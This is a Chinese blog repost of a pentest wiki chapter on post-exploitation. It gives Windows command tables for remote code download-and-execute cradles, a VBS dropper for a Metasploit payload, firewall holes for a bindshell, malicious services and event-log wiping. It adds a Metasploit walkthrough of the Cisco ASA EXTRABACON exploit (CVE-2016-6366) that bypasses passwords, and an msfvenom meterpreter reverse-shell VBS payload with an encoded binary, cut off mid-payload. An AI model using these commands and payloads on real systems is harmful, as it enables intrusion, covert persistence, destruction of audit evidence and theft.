devbox
小蓝xlanll
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

Pentest Wiki Part4 后渗透(一)

作者:小蓝xlanll | 2024-04-08 23:43:50

Pentest Wiki Part4 后渗透(一)

后渗透

0x01 前言

后渗透是渗透测试的关键组成部分。这就是您将自己与普通黑客区分开来的地方,实际上可以从渗透测试中提供有价值的信息和情报。后渗透针对特定系统,识别关键基础设施,并针对公司最重视的信息或数据,以及它试图保护的信息或数据。当你渗透一个又一个的系统时,你应该尝试着展示出那些对业务有最大影响的攻击。

在后渗透中,进行系统攻击时,应该花时间确定各个系统的功能以及不同的用户角色。例如,假设您了解了域基础架构系统,并以企业管理员身份运行或具有域管理权限。您可能是域管,但怎么与Active Directory通信的系统呢?公司的财务应用程序如何?你能否操控这个系统,然后在下一个支付阶段中,把所有的钱从公司转到别的账户上?目标的知识产权如何?

例如,假设您的客户是一家大型软件开发商,它将客户编码的应用程序发送给客户以供制造环境使用。你是否会在自己的源代码加上后门,实质上是让所有的客户都受到损害,那会损害他们的品牌可信度。

后渗透是一个棘手的事情,您必须花时间了解哪些信息可供您使用,然后将这些信息哪些又有利于你。攻击者通常会花费大量的时间在被攻陷的系统上上。像恶意攻击者一样思考 - 具有创造性,快速适应,依靠自己的智慧而不是自动化工具。

远程管理

CommandDescription
NET USE \\ip\ipc$ password /user:username与远程服务建立一个ipc连接,如果成功,您可以尝试查看,查询....具有正确的权限.
NET USE z: \\ip\sharepassword /user:username将远程共享映射为本地驱动器z:
systeminfo /S ComputerName /U username /P password此工具显示本地或远程计算机的操作系统配置信息,包括服务包级别.
tasklist /S SERVER /U DOMAIN\username /P password显示远程机器上当前正在运行的进程的列表.
taskkill /S SERVER /U DOMAIN\username /P password杀死远程服务器中的进程.
powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://ip:port/[file]'))"从远程服务器执行代码.
powershell.exe -w hidden -nop -ep bypass -c "(new-object net.webclient).DownloadFile('http://ip:port/file', 'C:\Windows\temp\testfile')"从远程服务器下载文件.
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File test.ps1本地执行test.ps1
bitsadmin /transfer systemrepair /download /priority normal http://path/to/filec:\path\local\file创建一个名为systemrepair的工作来从远程服务器上下载文件.
echo strUrl = WScript.Arguments.Item(0):StrFile = WScript.Arguments.Item(1):Set Post = CreateObject(^"Msxml2.XMLHTTP^"):Set Shell = CreateObject(^"Wscript.Shell^"):Post.Open ^"GET^",strUrl,0:Post.Send():Set aGet = CreateObject(^"ADODB.Stream^"):aGet.Mode = 3:aGet.Type = 1:aGet.Open():aGet.Write(Post.responseBody):aGet.SaveToFile StrFile,2 > wget.vbs<BR><BR>cscript.exe wget.vbs http://ip:port/filename C:\Windows\temp\filename用vbs下载文件
echo strFileURL = WScript.Arguments.Item(0):Set objXMLHTTP = CreateObject(^"MSXML2.XMLHTTP^"):objXMLHTTP.open ^"GET^", strFileURL, false:objXMLHTTP.send():shellcode = objXMLHTTP.responseText:strXML = ^"^<B64DECODE xmlns:dt=^" ^& Chr(34) ^& ^"urn:schemas-microsoft-com:datatypes^" ^& Chr(34) ^& ^" ^" ^& ^"dt:dt=^" ^& Chr(34) ^& ^"bin.base64^" ^& Chr(34) ^& ^"^>^" ^& shellcode ^& ^"^<^/B64DECODE^>^":Set oXMLDoc = CreateObject(^"MSXML2.DOMDocument.3.0^"):oXMLDoc.LoadXML(strXML):decode = oXMLDoc.selectsinglenode(^"B64DECODE^").nodeTypedValue:set oXMLDoc = nothing:Dim fso:Set fso = CreateObject(^"Scripting.FileSystemObject^"):Dim tempdir:Dim basedir:Set tempdir = fso.GetSpecialFolder(2):basedir = tempdir ^& ^"\^" ^& fso.GetTempName():fso.CreateFolder(basedir):tempexe = basedir ^& ^"\^" ^& ^"test.exe^":Dim adodbstream:Set adodbstream = CreateObject(^"ADODB.Stream^"):adodbstream.Type = 1:adodbstream.Open:adodbstream.Write decode:adodbstream.SaveToFile tempexe, 2:Dim wshell:Set wshell = CreateObject(^"Wscript.Shell^"):wshell.run tempexe, 0, true:fso.DeleteFile(tempexe):fso.DeleteFolder(basedir):Set fso = Nothing > %TEMP%\msf.vbs<BR><BR>cscript.exe %TEMP%\msf.vbs http://ip:port/vbspayload.txt下载并执行metasploit vbs payload.
PsExec.exe \\192.168.206.145 -accepteula -u username -p passwordcmd.exe /c ver远程执行Windows命令,并返回结果
wmic /node:SERVER /user:DOMAIN\username /password:password process call create "cmd /c vssadmin list shadows 2>&1 > c:\temp\output.txt"在远程服务器上创建一个新进程。 没有命令结果返回.

PROXY

CommandDescription
NETSH INTERFACE portproxy add v4tov4 listenport=LPORTconnectaddress=RHOST connectport=RPORT [listenaddress=LHOSTprotocol=tcp]将数据从本地端口传输到远程地址的指定端口.
set http_proxy=http://your_proxy:your_port<BR>set http_proxy=http://username:password@your_proxy:your_port<BR>set https_proxy=https://your_proxy:your_port<BR>set https_proxy=https://username:password@your_proxy:your_port在命令行下使用代理

Whitelist-白名单

CommandDescription
NETSH FIREWALL show all显示域/标准配置文件的允许的程序配置.
NETSH FIREWALL add allowedprogramC:\Windows\system32\cmd.exe cmd enable在防火墙允许的应用程序白名单中添加一个程序。
NETSH FIREWALL delete allowedprogram cmd从防火墙allowedprogram Whitelist删除一个项目,您也可以使用路径来删除它.
NETSH FIREWALL show all显示域/标准的端口配置.
NETSH FIREWALL add portopening tcp 4444bindshell enable all将tcp端口4444添加到端口白名单中.


Service

CommandDescription
sc create servicename type= own type= interact binPath= "c:\windows\system32\cmd.exe /c cmd.exe" & sc start servicename创建恶意服务,并获得本地系统特权.

Scheduler

CommandDescription
net use \\IP\ipc$ password/user:username<BR>at \\ComputerName time "command"AT命令安排命令和程序在指定的时间和日期在计算机上运行。net time [/domain]显示当前时间.

Logs

CommandDescription
del %WINDIR%*.log /a /s /q /f%WINDIR%目录中删除所有*.log文件.
wevtutil el列出系统保存的不同日志文件.
for /f %a in ('wevtutil el') do @wevtutil cl "%a"清除特定日志的内容.
powershell.exe -ep bypass -w hidden -c Clear-Eventlog -Log Application, System, Security清除特定的事件日志

参考链接

  1. How to execute metasploit vbs payload in cmd.exe ?
  2. Hacking Windows Active Directory
  3. How to dump windows 2012 credentials ?
  4. How to use PowerSploit Invoke-Mimikatz to dump credentials ?
  5. How to use vssadmin ?

How-to-hack-Cisco-ASA-with-CVE-2016-6366

Cisco ASA - CVE-2016-6366

思科自适应安全设备(ASA)软件的简单网络管理协议(SNMP)代码中的漏洞可能允许经过身份验证的远程攻击者重新加载受影响的系统或远程执行代码。

该漏洞是由于受影响的代码区域中存在缓冲区溢出。 当在虚拟或物理思科ASA设备上启用该漏洞时,该漏洞会影响所有版本的SNMP(版本1,2c和3)。 攻击者可以通过向受影响系统上的启用SNMP的接口发送精心设计的SNMP数据包来利用此漏洞。 攻击者可能允许攻击者执行任意代码并获得对系统的完全控制或导致受影响系统的重载。 攻击者必须知道SNMP字符串才能利用此漏洞。

注意:只有指向受影响系统的流量可用于利用此漏洞。 此漏洞仅影响以路由和透明防火墙模式以及单个或多个上下文模式配置的系统。 此漏洞只能由IPv4流量触发。 攻击者需要了解SNMP版本1和SNMP版本2c中配置的SNMP公共字符串或者SNMP版本3的有效用户名和密码。
思科发布了解决此漏洞的软件更新。 此通报的变通办法部分列出了缓解措施。

如何登录思科ASA?

如果您对Cisco ASA设备一无所知,请尝试使用nmap或自定义工具/方法发现有用的东西。
如果启用snmp,我们可以尝试使用metasploit破解密码。

  1. msf auxiliary(snmp_login) > set PASSWORD public
  2. PASSWORD => public
  3. msf auxiliary(snmp_login) > set RHOSTS 192.168.206.114
  4. RHOSTS => 192.168.206.114
  5. msf auxiliary(snmp_login) > run
  6.  
  7. [+] 192.168.206.114:161 - LOGIN SUCCESSFUL: public (Access level: read-write); Proof (sysDescr.0): Cisco Adaptive Security Appliance Version 9.2(1)
  8. [*] Scanned 1 of 1 hosts (100% complete)
  9. [*] Auxiliary module execution completed

现在,CVE-2016-6366可以帮助我们渗透远程cisco设备。

  1. msf auxiliary(cisco_asa_extrabacon) > show options
  2.  
  3. Module options (auxiliary/admin/cisco/cisco_asa_extrabacon):
  4.  
  5.    Name       Current Setting  Required  Description
  6.    ----       ---------------  --------  -----------
  7.    COMMUNITY  public           yes       SNMP Community String
  8.    MODE       pass-disable     yes       Enable or disable the password auth functions (Accepted: pass-disable, pass-enable)
  9.    RETRIES    1                yes       SNMP Retries
  10.    RHOST      192.168.206.114  yes       The target address
  11.    RPORT      161              yes       The target port
  12.    TIMEOUT    1                yes       SNMP Timeout
  13.  
  14. msf auxiliary(cisco_asa_extrabacon) > run
  15.  
  16. [*] Building pass-disable payload for version 9.2(1)...
  17. [*] Sending SNMP payload...
  18. [+] Clean return detected!
  19. [!] Don't forget to run pass-enable after logging in!
  20. [*] Auxiliary module execution completed

如果成功利用,请尝试用telnet登录。 攻击者可以不用密码登录到思科设备。

  1. $ telnet 192.168.206.114
  2. ciscoasa> ?
  3.   clear       Reset functions
  4.   enable      Turn on privileged commands
  5.   exit        Exit from the EXEC
  6.   help        Interactive help for commands
  7.   login       Log in as a particular user
  8.   logout      Exit from the EXEC
  9.   no          Negate a command or set its defaults
  10.   ping        Send echo messages
  11.   quit        Exit from the EXEC
  12.   show        Show running system information
  13.   traceroute  Trace route to destination

如何检查思科版本?

  1. ciscoasa> show version
  2.  
  3. Cisco Adaptive Security Appliance Software Version 9.2(1)
  4. Device Manager Version 7.2(1)
  5.  
  6. Compiled on Thu 24-Apr-14 12:14 PDT by builders
  7. System image file is "boot:/asa921-smp-k8.bin"
  8. Config file at boot was "startup-config"
  9.  
  10. ciscoasa up 2 hours 25 mins
  11.  
  12. Hardware:   ASAv, 2048 MB RAM, CPU Pentium II 2793 MHz,
  13. Internal ATA Compact Flash, 256MB
  14. Slot 1: ATA Compact Flash, 8192MB
  15. BIOS Flash Firmware Hub @ 0x1, 0KB
  16.  
  17.  
  18.  0: Ext: Management0/0       : address is 000c.29a9.88d6, irq 10
  19.  1: Ext: GigabitEthernet0/0  : address is 000c.29a9.88e0, irq 5
  20.  2: Ext: GigabitEthernet0/1  : address is 000c.29a9.88ea, irq 9
  21.  3: Ext: GigabitEthernet0/2  : address is 000c.29a9.88f4, irq 10
  22.  
  23. ASAv Platform License State: Unlicensed
  24. *Install -587174176 vCPU ASAv platform license for full functionality.
  25. The Running Activation Key is not valid, using default settings:
  26.  
  27. Licensed features for this platform:
  28. Virtual CPUs                      : 0              perpetual
  29. Maximum Physical Interfaces       : 10             perpetual
  30. Maximum VLANs                     : 50             perpetual
  31. Inside Hosts                      : Unlimited      perpetual
  32. Failover                          : Active/Standby perpetual
  33. Encryption-DES                    : Enabled        perpetual
  34. Encryption-3DES-AES               : Enabled        perpetual
  35. Security Contexts                 : 0              perpetual
  36. GTP/GPRS                          : Disabled       perpetual
  37. AnyConnect Premium Peers          : 2              perpetual
  38. AnyConnect Essentials             : Disabled       perpetual
  39. Other VPN Peers                   : 250            perpetual
  40. Total VPN Peers                   : 250            perpetual
  41. Shared License                    : Disabled       perpetual
  42. AnyConnect for Mobile             : Disabled       perpetual
  43. AnyConnect for Cisco VPN Phone    : Disabled       perpetual
  44. Advanced Endpoint Assessment      : Disabled       perpetual
  45. UC Phone Proxy Sessions           : 2              perpetual
  46. Total UC Proxy Sessions           : 2              perpetual
  47. Botnet Traffic Filter             : Enabled        perpetual
  48. Intercompany Media Engine         : Disabled       perpetual
  49. Cluster                           : Disabled       perpetual
  50.  
  51. This platform has an ASAv VPN Premium license.
  52.  
  53. Serial Number: 9ATJDXTHK3B
  54. Running Permanent Activation Key: 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000
  55.  
  56. Image type          : Release
  57. Key version         : A
  58.  
  59. Configuration last modified by enable_15 at 10:12:25.439 UTC Mon Sep 26 2016

如何进入特权模式?

enable可以用来进入思科配置模式。 通常,密码为空。

  1. ciscoasa> help enable
  2.  
  3. USAGE:
  4.  
  5.     enable [<priv_level>]
  6.  
  7. DESCRIPTION:
  8.  
  9. enable      Turn on privileged commands
  10.  
  11. ciscoasa> enable ?
  12.  
  13.   <0-15>  Enter optional privilege level (0-15)
  14.   <cr>
  15.  
  16.   ciscoasa> enable
  17.   Password:
  18.   ciscoasa# configure terminal
  19.   ciscoasa(config)# ?
  20.  
  21.     aaa                           Enable, disable, or view user authentication,
  22.                                   authorization and accounting
  23.     aaa-server                    Configure a AAA server group or a AAA server
  24.     access-group                  Bind an access-list to an interface to filter
  25.                                   traffic
  26.     access-list                   Configure an access control element
  27.     arp                           Change or view ARP table, set ARP timeout
  28.                                   value, view statistics
  29.     as-path                       BGP autonomous system path filter
  30.     asdm                          Configure Device Manager
  31.     asp                           Configure ASP parameters
  32.     auth-prompt                   Customize authentication challenge, reject or
  33.                                   acceptance prompt
  34.     auto-update                   Configure Auto Update
  35.     banner                        Configure login/session banners
  36.     bgp-community                 format for BGP community
  37.     boot                          Set system boot parameters
  38.     ca                            Certification authority
  39.     call-home                     Smart Call-Home Configuration
  40.     checkheaps                    Configure checkheap verification intervals
  41.     class-map                     Configure MPF Class Map
  42.     clear                         Clear
  43.     client-update                 Configure and change client update parameters
  44.     clock                         Configure time-of-day clock
  45.     cluster                       Cluster configuration
  46.     command-alias                 Create command alias
  47.     community-list                Add a community list entry
  48.     compression                   Configure global Compression parameters
  49.     configure                     Configure using various methods
  50.     console                       Serial console functions
  51.     coredump                      Configure Coredump options
  52.     crashinfo                     Enable/Disable writing crashinfo to flash
  53.     crypto                        Configure IPSec, ISAKMP, Certification
  54.                                   authority, key
  55.     ctl-file                      Configure a ctl-file instance
  56.     ctl-provider                  Configure a CTL Provider instance
  57.     cts                           Cisco Trusted Security commands
  58.     ddns                          Configure dynamic DNS update method
  59.     dhcp-client                   Configure parameters for DHCP client operation
  60.     dhcpd                         Configure DHCP Server
  61.     dhcprelay                     Configure DHCP Relay Agent
  62.     dns                           Add DNS functionality to an interface
  63.     dns-group                     Set the global DNS server group
  64.     dns-guard                     Enforce one DNS response per query
  65.     domain-name                   Change domain name
  66.     dynamic-access-policy-record  Dynamic Access Policy configuration commands
  67.     dynamic-filter                Configure Dynamic Filter
  68.     dynamic-map                   Configure crypto dynamic map
  69.     enable                        Configure password for the enable command
  70.     end                           Exit from configure mode
  71.     established                   Allow inbound connections based on established
  72.                                   connections
  73.     event                         Configure event manager
  74.     exit                          Exit from config mode
  75.     failover                      Enable/disable failover feature
  76.     filter                        Enable or disable URL, FTP, HTTPS, Java, and
  77.                                   ActiveX filtering
  78.     fips                          FIPS 140-2 compliance information
  79.     firewall                      Switch to router/transparent mode
  80.     fixup                         Add or delete inspection services
  81.     flow-export                   Configure flow information export through
  82.                                   NetFlow
  83.     fragment                      Configure the IP fragment database
  84.     ftp                           Set FTP mode
  85.     ftp-map                       Configure advanced options for FTP inspection
  86.     group-delimiter               The delimiter for tunnel-group lookup.
  87.     group-policy                  Configure or remove a group policy
  88.     gtp-map                       Configure advanced options for GTP inspection
  89.     h225-map                      Configure advanced options for H225 inspection
  90.     help                          Interactive help for commands
  91.     hostname                      Change host name of the system
  92.     hpm                           Configure TopN host statistics collection
  93.     http                          Configure http server and https related
  94.                                   commands
  95.     http-map                      This command has been deprecated.
  96.     icmp                          Configure access rules for ICMP traffic
  97.     imap4s                        Configure the imap4s service
  98.     interface                     Select an interface to configure
  99.     ip                            Configure IP address pools
  100.     ip                            Configure IP addresses, address pools, IDS, etc
  101.     ipsec                         Configure transform-set, IPSec SA lifetime and
  102.                                   PMTU Aging reset timer
  103.     ipv6                          Configure IPv6 address pools
  104.     ipv6                          Global IPv6 configuration commands
  105.     ipv6-vpn-addr-assign          Global settings for VPN IP address assignment
  106.                                   policy
  107.     isakmp                        Configure ISAKMP options
  108.     jumbo-frame                   Configure jumbo-frame support
  109.     key                           Create various configuration keys
  110.     l2tp                          Configure Global L2TP Parameters
  111.     ldap                          Configure LDAP Mapping
  112.     logging                       Configure logging levels, recipients and other
  113.                                   options
  114.     logout                        Logoff from config mode
  115.     mac-address                   MAC address options
  116.     mac-list                      Create a mac-list to filter based on MAC
  117.                                   address
  118.     management-access             Configure management access interface
  119.     map                           Configure crypto map
  120.     media-termination             Configure a media-termination instance
  121.     mgcp-map                      Configure advanced options for MGCP inspection
  122.     migrate                       Migrate IKEv1 configuration to IKEv2/SSL
  123.     monitor-interface             Enable or disable failover monitoring on a
  124.                                   specific interface
  125.     mount                         Configure a system mount
  126.     mroute                        Configure static multicast routes
  127.     mtu                           Specify MTU(Maximum Transmission Unit) for an
  128.                                   interface
  129.     multicast-routing             Enable IP multicast
  130.     name                          Associate a name with an IP address
  131.     names                         Enable/Disable IP address to name mapping
  132.     nat                           Associate a network with a pool of global IP
  133.                                   addresses
  134.     no                            Negate a command or set its defaults
  135.     ntp                           Configure NTP
  136.     nve                           Configure an Network Virtulization Endpoint
  137.                                   (NVE)
  138.     object                        Configure an object
  139.     object-group                  Create an object group for use in
  140.                                   'access-list', etc
  141.     object-group-search           Enables object group search algorithm
  142.     pager                         Control page length for pagination
  143.     passwd                        Change Telnet console access password
  144.     password                      Configure password encryption
  145.     password-policy               Configure password policy options
  146.     phone-proxy                   Configure a Phone proxy instance
  147.     pim                           Configure Protocol Independent Multicast
  148.     policy-list                   Define IP Policy list
  149.     policy-map                    Configure MPF Parameter Map
  150.     pop3s                         Configure the pop3s service
  151.     prefix-list                   Build a prefix list
  152.     priority-queue                Enter sub-command mode to set priority-queue
  153.                                   attributes
  154.     privilege                     Configure privilege levels for commands
  155.     prompt                        Configure session prompt display
  156.     quit                          Exit from config mode
  157.     quota                         Configure quotas
  158.     regex                         Define a regular expression
  159.     remote-access                 Configure SNMP trap threshold for VPN
  160.                                   remote-access sessions
  161.     route                         Configure a static route for an interface
  162.     route-map                     Create route-map or enter route-map
  163.                                   configuration mode
  164.     router                        Enable a routing process
  165.     same-security-traffic         Enable same security level interfaces to
  166.                                   communicate
  167.     scansafe                      Scansafe configuration
  168.     service                       Configure system services
  169.     service-interface             service-interface for dynamic interface types
  170.     service-policy                Configure MPF service policy
  171.     setup                         Pre-configure the system
  172.     sla                           IP Service Level Agreement
  173.     smtp-server                   Configure default SMTP server address to be
  174.                                   used for Email
  175.     smtps                         Configure the smtps service
  176.     snmp                          Configure the SNMP options
  177.     snmp-map                      Configure an snmp-map, to control the operation
  178.                                   of the SNMP inspection
  179.     snmp-server                   Modify SNMP engine parameters
  180.     ssh                           Configure SSH options
  181.     ssl                           Configure SSL options
  182.     sunrpc-server                 Create SUNRPC services table
  183.     sysopt                        Set system functional options
  184.     tcp-map                       Configure advanced options for TCP inspection
  185.     telnet                        Add telnet access to system console or set idle
  186.                                   timeout
  187.     terminal                      Set terminal line parameters
  188.     tftp-server                   Configure default TFTP server address and
  189.                                   directory
  190.     threat-detection              Show threat detection information
  191.     time-range                    Define time range entries
  192.     timeout                       Configure maximum idle times
  193.     tls-proxy                     Configure a TLS proxy instance or the maximum
  194.                                   sessions
  195.     track                         Object tracking configuration commands
  196.     tunnel-group                  Create and manage the database of connection
  197.                                   specific records for IPSec connections
  198.     tunnel-group-map              Specify policy by which the tunnel-group name
  199.                                   is derived from the content of a certificate.
  200.     uc-ime                        Configure a Cisco Intercompany Media Engine
  201.                                   (UC-IME) instance
  202.     url-block                     Enable URL pending block buffer and long URL
  203.                                   support
  204.     url-cache                     Enable/Disable URL caching
  205.     url-server                    Configure a URL filtering server
  206.     user-identity                 Configure user-identity firewall
  207.     username                      Configure user authentication local database
  208.     virtual                       Configure address for authentication virtual
  209.                                   servers
  210.     vnmc                          Configure VNMC params
  211.     vpdn                          Configure VPDN feature
  212.     vpn                           Configure VPN parameters.
  213.     vpn-addr-assign               Global settings for VPN IP address assignment
  214.                                   policy
  215.     vpn-sessiondb                 Configure the VPN Session Manager
  216.     vpnsetup                      Configure VPN Setup Commands
  217.     vxlan                         Configure VXLAN system parameters
  218.     wccp                          Web-Cache Coordination Protocol Commands
  219.     webvpn                        Configure the WebVPN service
  220.     xlate                         Configure an xlate option
  221.     zonelabs-integrity            ZoneLabs integrity Firewall Server
  222.                                   Configuration

如何配置cisco接口?

  1. ciscoasa(config)# interface ?
  2.  
  3. configure mode commands/options:
  4.   GigabitEthernet  GigabitEthernet IEEE 802.3z
  5.   Management       Management interface
  6.   Redundant        Redundant Interface
  7.   TVI              Tenant Virtual Interface
  8.   vni              VNI Interface
  9.   <cr>
  10.  
  11. ciscoasa(config)# interface GigabitEthernet ?
  12.  
  13. configure mode commands/options:
  14.   <0-0>  GigabitEthernet interface number
  15.  
  16. ciscoasa(config)# interface GigabitEthernet 0/?
  17.  
  18. configure mode commands/options:
  19.   <0-2>  GigabitEthernet interface number
  20.  
  21. ciscoasa(config)# interface GigabitEthernet 0/0

如何设置IP地址?

  1. ciscoasa(config-if)# ?
  2.  
  3. Interface configuration commands:
  4.   authentication   authentication subcommands
  5.   ddns             Configure dynamic DNS
  6.   default          Set a command to its defaults
  7.   delay            Specify interface throughput delay
  8.   description      Interface specific description
  9.   dhcp             Configure parameters for DHCP client
  10.   dhcprelay        Configure DHCP Relay Agent
  11.   duplex           Configure duplex operation
  12.   exit             Exit from interface configuration mode
  13.   flowcontrol      Configure flowcontrol operation
  14.   hello-interval   Configures EIGRP-IPv4 hello interval
  15.   help             Interactive help for interface subcommands
  16.   hold-time        Configures EIGRP-IPv4 hold time
  17.   igmp             IGMP interface commands
  18.   ip               Configure the ip address
  19.   ipv6             IPv6 interface subcommands
  20.   mac-address      Assign MAC address to interface
  21.   management-only  Dedicate an interface to management. Block thru traffic
  22.   mfib             Interface Specific MFIB Control
  23.   multicast        Configure multicast routing
  24.   nameif           Assign name to interface
  25.   no               Negate a command or set its defaults
  26.   ospf             OSPF interface commands
  27.   pim              PIM interface commands
  28.   pppoe            Configure parameters for PPPoE client
  29.   rip              Router Information Protocol
  30.   security-level   Specify the security level of this interface after this
  31.                    keyword, Eg: 0, 100 etc. The relative security level between
  32.                    two interfaces determines the way the Adaptive Security
  33.                    Algorithm is applied. A lower security_level interface is
  34.                    outside relative to a higher level interface and equivalent
  35.                    interfaces are outside to each other
  36.   shutdown         Shutdown the selected interface
  37.   speed            Configure speed operation
  38.   split-horizon    Configures EIGRP-IPv4 split-horizon
  39.   summary-address  Configures EIGRP-IPv4 summary-address
  1. ciscoasa(config-if)# ip address ?
  2.  
  3. interface mode commands/options:
  4.   Hostname or A.B.C.D  Firewall's network interface address
  5.   dhcp                 Keyword to use DHCP to poll for information. Enables the
  6.                        DHCP client feature on the specified interface
  7.   pppoe                Keyword to use PPPoE to poll for information. Enables
  8.                        the PPPoE client feature on the specified interface
  9. ciscoasa(config)#  ip address 192.168.206.114 255.255.255.0
  10. ciscoasa(config-if)# no shutdown
  11. ciscoasa(config-if)# exit
  12. ciscoasa(config)# exit
  13. ciscoasa# ping 192.168.206.1
  14. Type escape sequence to abort.
  15. Sending 5, 100-byte ICMP Echos to 192.168.206.1, timeout is 2 seconds:
  16. !!!!!
  17. Success rate is 100 percent (5/5), round-trip min/avg/max = 1/2/10 ms

如何启用snmp服务?

  1. ciscoasa# configure terminal
  2. ciscoasa(config)# snmp-server host inside 192.168.206.1 community 0 public

如何启用启用SSH服务?

  1. ciscoasa# configure terminal
  2. ciscoasa(config)# username admin password password
  3. ciscoasa(config)# aaa authentication ssh console LOCAL
  4. ciscoasa(config)# passwd password
  5. ciscoasa(config)# crypto key generate rsa ?            
  6.  
  7. configure mode commands/options:
  8.   general-keys  Generate a general purpose RSA key pair for signing and
  9.                 encryption
  10.   label         Provide a label
  11.   modulus       Provide number of modulus bits on the command line
  12.   noconfirm     Specify this keyword to suppress all interactive prompting.
  13.   usage-keys    Generate seperate RSA key pairs for signing and encryption
  14.   <cr>
  15. ciscoasa(config)# crypto key generate rsa modulus ?
  16.  
  17. configure mode commands/options:
  18.   1024  1024 bits
  19.   2048  2048 bits
  20.   4096  4096 bits
  21.   512   512 bits
  22.   768   768 bits
  23.  
  24. ciscoasa(config)#  ssh 192.168.206.1 255.255.255.0 inside
  25. ciscoasa(config)#  ssh 192.168.206.137 255.255.255.0 inside
  26. ciscoasa(config)#  ssh version 2

如何启用Telnet服务?

  1. ciscoasa# configure terminal
  2. ciscoasa(config)# aaa authentication telnet console LOCAL
  3. ciscoasa(config)# telnet 0.0.0.0 0.0.0.0 inside

链接

  1. https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp
  2. http://www.cisco.com/c/en/us/support/docs/security/asa-5500-x-series-next-generation-3.firewalls/118075-configure-asa-00.html
  3. https://github.com/RiskSense-Ops/CVE-2016-6366/
  4. http://paper.seebug.org/31/

Windows_ActiveDirectory

在cmd shell中执行metasploit vbs payload

如果你是一个pentester/安全研究员,你可能希望从cmd shell获得meterpreter会话,例如:sqlmap --os-shell或其他工具。例如:

  1. $ ncat -l -p 4444
  2. Microsoft Windows XP [Version 5.1.2600]
  3. (C) Copyright 1985-2001 Microsoft Corp.  
  4.  
  5. C:\Documents and Settings\test\Desktop>ver
  6. ver  
  7.  
  8. Microsoft Windows XP [Version 5.1.2600]
  9. C:\Documents and Settings\test\Desktop>

在以前,你可能会尝试下面的方法:

  • 将exe转换成批处理脚本。
  • 从远程服务器下载payload文件(ftp,tftp,http,....)
  • ......

现在,我将向您展示如何在cmd.exe中运行metasploit payload。 请尝试考虑以下问题:

  • 如何用msfvenom生成一个payload?
  • 如何以简单/兼容的方式运行payload?
如何用msfvenom生成一个payload?
  1. $ msfvenom -p windows/meterpreter/reverse_tcp
  2.  LHOST=192.168.1.100 LPORT=4444 -f vbs --arch x86 --platform win
  3.  
  4.  No encoder or badchars specified, outputting raw payload
  5.  Payload size: 333 bytes
  6.  Final size of vbs file: 7370 bytes
  7.  Function oSpLpsWeU(XwXDDtdR)
  8.   urGQiYVn = "" & _           
  9.   XwXDDtdR & ""      
  10.   Set gFMdOBBiLZ = CreateObject("MSXML2.DOMDocument.3.0")
  11.   gFMdOBBiLZ.LoadXML(urGQiYVn)
  12.   oSpLpsWeU = gFMdOBBiLZ.selectsinglenode("B64DECODE").nodeTypedValue
  13.   set gFMdOBBiLZ = nothing
  14.  End Function
  15.  
  16.  Function skbfzWOqR()
  17.   cTENSbYbnWY = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAMC7z0MAAAAAAAAAAOAADwMLAQI4AAIAAAAOAAAAAAAAABAAAAAQAAAAIAAAAABAAAAQAAAAAgAABAAAAAEAAAAEAAAAAAAAAABAAAAAAgAARjoAAAIAAAAAACAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAAAwAABkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAAKAAAAAAQAAAAAgAAAAIAAAAAAAAAAAAAAAAAACAAMGAuZGF0YQAAAJAKAAAAIAAAAAwAAAAEAAAAAAAAAAAAAAAAAAAgADDgLmlkYXRhAABkAAAAADAAAAACAAAAEAAAAAAAAAAAAAAAAAAAQAAwwAAAAAAAAAAAAAAAAAAAAAC4ACBAAP/gkP8lODBAAJCQAAAAAAAAAAD/AAAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAL4mar2h28rZdCT0WCvJZrkEAoPABDFwEQNwN4hIkPcku8O3tN8cB9GWw5vxKwNjAkyNhjNM6cNkfHmBiPcvMRp1+DarMN55LGgiGK5zd/qPu4r7yKZnqYGt2l2l+ObW9e1uC00PXprFVkAdCePJBU7OgL6kpBIW9UW4Vzm0wJD+J7fo/NrAL34BRKvYwv4X2AeY3Nbs7rr68yOxB3/CFY474bHKmIjgtk+08hgvEHm0JCkg0YkA2iGGE6kTCYglGMIWsl/57yyeAhBlZVZAHUzXC91xAqHY5W2e45EF3eNIimgFOmI7mfvS+0mUOPS2hELe3y+tt4jHVJJCeZgIL7kSudB008jCYYIyGnIvM3B2+WTsdNxDs4cL0LN4yuHIT1hOpq+MTjbmxk5eX